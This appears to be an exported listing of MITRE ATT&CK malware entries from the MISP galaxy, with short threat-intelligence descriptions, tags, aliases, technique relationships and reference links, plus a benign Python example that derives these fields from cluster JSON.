[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

The tag is: misp-galaxy:mitre-malware="SDBbot - S0461"

SDBbot - S0461 is also known as:

  • SDBbot

Table 7508. Table References

Links

https://attack.mitre.org/software/S0461

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

SVCReady - S1064

[SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)

The tag is: misp-galaxy:mitre-malware="SVCReady - S1064"

SVCReady - S1064 is also known as:

  • SVCReady

Table 7509. Table References

Links

https://attack.mitre.org/software/S1064

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

RDFSNIFFER - S0416

[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="RDFSNIFFER - S0416"

RDFSNIFFER - S0416 is also known as:

  • RDFSNIFFER

Table 7510. Table References

Links

https://attack.mitre.org/software/S0416

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

TDTESS - S0164

[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)

The tag is: misp-galaxy:mitre-malware="TDTESS - S0164"

TDTESS - S0164 is also known as:

  • TDTESS

TDTESS - S0164 has relationships with:

  • similar: misp-galaxy:malpedia="TDTESS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7511. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/software/S0164

PowGoop - S1046

[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)

The tag is: misp-galaxy:mitre-malware="PowGoop - S1046"

PowGoop - S1046 is also known as:

  • PowGoop

Table 7512. Table References

Links

https://attack.mitre.org/software/S1046

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Kobalos - S0641

[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)

The tag is: misp-galaxy:mitre-malware="Kobalos - S0641"

Kobalos - S0641 is also known as:

  • Kobalos

Table 7513. Table References

Links

https://attack.mitre.org/software/S0641

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf

ANDROMEDA - S1074

[ANDROMEDA](https://attack.mitre.org/software/S1074) is commodity malware that was widespread in the early 2010s and continues to be observed in infections across a wide variety of industries. During the 2022 [C0026](https://attack.mitre.org/campaigns/C0026) campaign, threat actors re-registered expired [ANDROMEDA](https://attack.mitre.org/software/S1074) C2 domains to spread malware to select targets in Ukraine.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="ANDROMEDA - S1074"

ANDROMEDA - S1074 is also known as:

  • ANDROMEDA

Table 7514. Table References

Links

https://attack.mitre.org/software/S1074

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

GRIFFON - S0417

[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)

The tag is: misp-galaxy:mitre-malware="GRIFFON - S0417"

GRIFFON - S0417 is also known as:

  • GRIFFON

Table 7515. Table References

Links

https://attack.mitre.org/software/S0417

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

Mori - S1047

[Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)

The tag is: misp-galaxy:mitre-malware="Mori - S1047"

Mori - S1047 is also known as:

  • Mori

Table 7516. Table References

Links

https://attack.mitre.org/software/S1047

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Pteranodon - S0147

[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)

The tag is: misp-galaxy:mitre-malware="Pteranodon - S0147"

Pteranodon - S0147 is also known as:

  • Pteranodon

  • Pterodo

Pteranodon - S0147 has relationships with:

  • similar: misp-galaxy:malpedia="Pteranodon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7517. Table References

Links

https://attack.mitre.org/software/S0147

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://www.secureworks.com/research/threat-profiles/iron-tilden

build_downer - S0471

[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="build_downer - S0471"

build_downer - S0471 is also known as:

  • build_downer

Table 7518. Table References

Links

https://attack.mitre.org/software/S0471

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

QUIETEXIT - S1084

[QUIETEXIT](https://attack.mitre.org/software/S1084) is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021. [APT29](https://attack.mitre.org/groups/G0016) has deployed [QUIETEXIT](https://attack.mitre.org/software/S1084) on opaque network appliances that typically don’t support antivirus or endpoint detection and response tools within a victim environment.(Citation: Mandiant APT29 Eye Spy Email Nov 22)

The tag is: misp-galaxy:mitre-malware="QUIETEXIT - S1084"

QUIETEXIT - S1084 is also known as:

  • QUIETEXIT

Table 7519. Table References

Links

https://attack.mitre.org/software/S1084

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

POWRUNER - S0184

[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-malware="POWRUNER - S0184"

POWRUNER - S0184 is also known as:

  • POWRUNER

POWRUNER - S0184 has relationships with:

  • similar: misp-galaxy:malpedia="POWRUNER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7520. Table References

Links

https://attack.mitre.org/software/S0184

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

ViceLeaker - S0418

[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)

The tag is: misp-galaxy:mitre-malware="ViceLeaker - S0418"

ViceLeaker - S0418 is also known as:

  • ViceLeaker

  • Triout

Table 7521. Table References

Links

https://attack.mitre.org/software/S0418

https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/

https://securelist.com/fanning-the-flames-viceleaker-operation/90877/

RTM - S0148

[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)

The tag is: misp-galaxy:mitre-malware="RTM - S0148"

RTM - S0148 is also known as:

  • RTM

  • Redaman

RTM - S0148 has relationships with:

  • similar: misp-galaxy:malpedia="RTM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"

Table 7522. Table References

Links

https://attack.mitre.org/software/S0148

https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

SUGARUSH - S1049

[SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890’s [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022)

The tag is: misp-galaxy:mitre-malware="SUGARUSH - S1049"

SUGARUSH - S1049 is also known as:

  • SUGARUSH

Table 7523. Table References

Links

https://attack.mitre.org/software/S1049

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

SimBad - S0419

[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name "SimBad" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)

The tag is: misp-galaxy:mitre-malware="SimBad - S0419"

SimBad - S0419 is also known as:

  • SimBad

Table 7524. Table References

Links

https://attack.mitre.org/software/S0419

https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/

MoonWind - S0149

[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)

The tag is: misp-galaxy:mitre-malware="MoonWind - S0149"

MoonWind - S0149 is also known as:

  • MoonWind

MoonWind - S0149 has relationships with:

  • similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="MoonWind" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7525. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

https://attack.mitre.org/software/S0149

StrongPity - S0491

[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-malware="StrongPity - S0491"

StrongPity - S0491 is also known as:

  • StrongPity

Table 7526. Table References

Links

https://attack.mitre.org/software/S0491

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

SharkBot - S1055

[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)

The tag is: misp-galaxy:mitre-malware="SharkBot - S1055"

SharkBot - S1055 is also known as:

  • SharkBot

Table 7527. Table References

Links

https://attack.mitre.org/software/S1055

https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/

WINDSHIELD - S0155

[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="WINDSHIELD - S0155"

WINDSHIELD - S0155 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7528. Table References

Links

https://attack.mitre.org/software/S0155

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

GoldenEagle - S0551

[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="GoldenEagle - S0551"

GoldenEagle - S0551 is also known as:

  • GoldenEagle

Table 7529. Table References

Links

https://attack.mitre.org/software/S0551

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

WellMail - S0515

[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMail - S0515"

WellMail - S0515 is also known as:

  • WellMail

Table 7530. Table References

Links

https://attack.mitre.org/software/S0515

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

SombRAT - S0615

[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)

The tag is: misp-galaxy:mitre-malware="SombRAT - S0615"

SombRAT - S0615 is also known as:

  • SombRAT

Table 7531. Table References

Links

https://attack.mitre.org/software/S0615

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

BoxCaon - S0651

[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)

The tag is: misp-galaxy:mitre-malware="BoxCaon - S0651"

BoxCaon - S0651 is also known as:

  • BoxCaon

Table 7532. Table References

Links

https://attack.mitre.org/software/S0651

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

SoreFang - S0516

[SoreFang](https://attack.mitre.org/software/S0516) is a first-stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)

The tag is: misp-galaxy:mitre-malware="SoreFang - S0516"

SoreFang - S0516 is also known as:

  • SoreFang

Table 7533. Table References

Links

https://attack.mitre.org/software/S0516

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

KOMPROGO - S0156

[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="KOMPROGO - S0156"

KOMPROGO - S0156 is also known as:

  • KOMPROGO

KOMPROGO - S0156 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7534. Table References

Links

https://attack.mitre.org/software/S0156

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
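
The tag, alias, relationship and reference lines in entries such as the one above are all derived from the galaxy's cluster JSON. The following is an added example of that derivation, not code from the MISP project; it uses a constructed cluster file in the layout of the misp-galaxy repository (a top-level "values" list with "value", "meta.synonyms", "meta.refs" and "related" entries carrying "dest-uuid", "type" and qualifier "tags"), and the entry name, UUIDs and URLs in it are invented for the illustration.

```python
import json


# Constructed sample in the layout used by misp-galaxy cluster files
# (clusters/<galaxy>.json): a top-level "values" list whose items carry
# "value", "description", "meta" and "related". The entry, UUIDs and URLs
# below are illustrative and are not copied from the real galaxy.
SAMPLE_CLUSTER_FILE = json.dumps({
    "name": "Malware",
    "type": "mitre-malware",
    "values": [
        {
            "uuid": "00000000-0000-4000-8000-000000000001",
            "value": "ExampleBackdoor - S9999",
            "description": "Constructed sample entry for the example.",
            "meta": {
                "external_id": "S9999",
                "synonyms": ["ExampleBackdoor", "EXBD"],
                "refs": [
                    "https://example.invalid/vendor-report",
                    "https://attack.mitre.org/software/S9999",
                ],
            },
            "related": [
                {
                    "dest-uuid": "00000000-0000-4000-8000-0000000000aa",
                    "type": "uses",
                    "tags": ['estimative-language:likelihood-probability="almost-certain"'],
                },
                {
                    "dest-uuid": "00000000-0000-4000-8000-0000000000bb",
                    "type": "similar",
                    "tags": ['estimative-language:likelihood-probability="likely"'],
                },
            ],
        }
    ],
})

# dest-uuid -> (galaxy type, cluster value). Constructed here; for real use you
# build it by indexing "uuid" -> "value" across every cluster file you load.
# The second related UUID above is deliberately absent to show the fallback.
UUID_INDEX = {
    "00000000-0000-4000-8000-0000000000aa": (
        "mitre-attack-pattern",
        "Windows Management Instrumentation - T1047",
    ),
}


def misp_tag(galaxy_type, value):
    """Tag string MISP attaches when a cluster is applied to an event."""
    return f'misp-galaxy:{galaxy_type}="{value}"'


def load_cluster_file(text):
    """Parse a cluster file and reject anything without the fields relied on below."""
    cluster = json.loads(text)
    if not isinstance(cluster.get("values"), list) or "type" not in cluster:
        raise ValueError("not a misp-galaxy cluster file")
    return cluster


def render_relationship(rel, uuid_index):
    """'<type>: <tag of target> with <qualifier tags>', as this document prints it."""
    target = uuid_index.get(rel["dest-uuid"])
    if target is None:
        # Cross-galaxy links can point at clusters that were not loaded.
        target_text = f'<unresolved {rel["dest-uuid"]}>'
    else:
        target_text = misp_tag(*target)
    qualifiers = " ".join(rel.get("tags", []))
    line = f'{rel["type"]}: {target_text}'
    return f"{line} with {qualifiers}" if qualifiers else line


def render_entry(cluster, entry, uuid_index):
    """Derive tag, aliases, relationships and sorted references for one entry."""
    meta = entry.get("meta", {})
    return {
        "tag": misp_tag(cluster["type"], entry["value"]),
        "also_known_as": list(meta.get("synonyms", [])),
        "relationships": [render_relationship(r, uuid_index) for r in entry.get("related", [])],
        "references": sorted(set(meta.get("refs", []))),
    }


def render_all(text, uuid_index):
    cluster = load_cluster_file(text)
    return [render_entry(cluster, e, uuid_index) for e in cluster["values"]]


if __name__ == "__main__":
    for rendered in render_all(SAMPLE_CLUSTER_FILE, UUID_INDEX):
        print("The tag is:", rendered["tag"])
        for line in rendered["relationships"]:
            print("  \u2022", line)
        for ref in rendered["references"]:
            print("  ", ref)
```

The unresolved-UUID branch matters in practice: "related" entries routinely point into other galaxies (attack-pattern, malpedia, tool), so a consumer that only loads one cluster file must expect dangling links rather than fail on them.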

GuLoader - S0561

[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)

The tag is: misp-galaxy:mitre-malware="GuLoader - S0561"

GuLoader - S0561 is also known as:

  • GuLoader

Table 7535. Table References

Links

https://attack.mitre.org/software/S0561

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

OSInfo - S0165

[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim’s computer and network. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="OSInfo - S0165"

OSInfo - S0165 is also known as:

  • OSInfo

OSInfo - S0165 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 7536. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/software/S0165

TianySpy - S1056

[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122)

The tag is: misp-galaxy:mitre-malware="TianySpy - S1056"

TianySpy - S1056 is also known as:

  • TianySpy

Table 7537. Table References

Links

https://attack.mitre.org/software/S1056

https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html

KOPILUWAK - S1075

[KOPILUWAK](https://attack.mitre.org/software/S1075) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="KOPILUWAK - S1075"

KOPILUWAK - S1075 is also known as:

  • KOPILUWAK

Table 7538. Table References

Links

https://attack.mitre.org/software/S1075

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

SOUNDBITE - S0157

[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="SOUNDBITE - S0157"

SOUNDBITE - S0157 is also known as:

  • SOUNDBITE

SOUNDBITE - S0157 has relationships with:

  • similar: misp-galaxy:malpedia="SOUNDBITE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7539. Table References

Links

https://attack.mitre.org/software/S0157

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Pillowmint - S0517

[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)

The tag is: misp-galaxy:mitre-malware="Pillowmint - S0517"

Pillowmint - S0517 is also known as:

  • Pillowmint

Table 7540. Table References

Links

https://attack.mitre.org/software/S0517

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

SEASHARPEE - S0185

[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)

The tag is: misp-galaxy:mitre-malware="SEASHARPEE - S0185"

SEASHARPEE - S0185 is also known as:

  • SEASHARPEE

SEASHARPEE - S0185 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7541. Table References

Links

https://attack.mitre.org/software/S0185

https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east

PHOREAL - S0158

[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="PHOREAL - S0158"

PHOREAL - S0158 is also known as:

  • PHOREAL

PHOREAL - S0158 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7542. Table References

Links

https://attack.mitre.org/software/S0158

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

PolyglotDuke - S0518

[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="PolyglotDuke - S0518"

PolyglotDuke - S0518 is also known as:

  • PolyglotDuke

Table 7543. Table References

Links

https://attack.mitre.org/software/S0518

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

Prestige - S1058

[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)

The tag is: misp-galaxy:mitre-malware="Prestige - S1058"

Prestige - S1058 is also known as:

  • Prestige

Table 7544. Table References

Links

https://attack.mitre.org/software/S1058

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

Sardonic - S1085

[Sardonic](https://attack.mitre.org/software/S1085) is a backdoor written in C and C++ that has been used by [FIN8](https://attack.mitre.org/groups/G0061) since at least August 2021, including to target a financial institution in the United States. [Sardonic](https://attack.mitre.org/software/S1085) has a plugin system that can load specially made DLLs and execute their functions.(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)

The tag is: misp-galaxy:mitre-malware="Sardonic - S1085"

Sardonic - S1085 is also known as:

  • Sardonic

Table 7545. Table References

Links

https://attack.mitre.org/software/S1085

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

SNUGRIDE - S0159

[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="SNUGRIDE - S0159"

SNUGRIDE - S0159 is also known as:

  • SNUGRIDE

SNUGRIDE - S0159 has relationships with:

  • similar: misp-galaxy:tool="SNUGRIDE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7546. Table References

Links

https://attack.mitre.org/software/S0159

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

metaMain - S1059

[metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)

The tag is: misp-galaxy:mitre-malware="metaMain - S1059"

metaMain - S1059 is also known as:

  • metaMain

Table 7547. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/software/S1059

https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm

DEATHRANSOM - S0616

[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="DEATHRANSOM - S0616"

DEATHRANSOM - S0616 is also known as:

  • DEATHRANSOM

Table 7548. Table References

Links

https://attack.mitre.org/software/S0616

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

RemoteCMD - S0166

[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system, similar to the functionality of Sysinternals PsExec. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="RemoteCMD - S0166"

RemoteCMD - S0166 is also known as:

  • RemoteCMD

RemoteCMD - S0166 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 7549. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/software/S0166

DarkTortilla - S1066

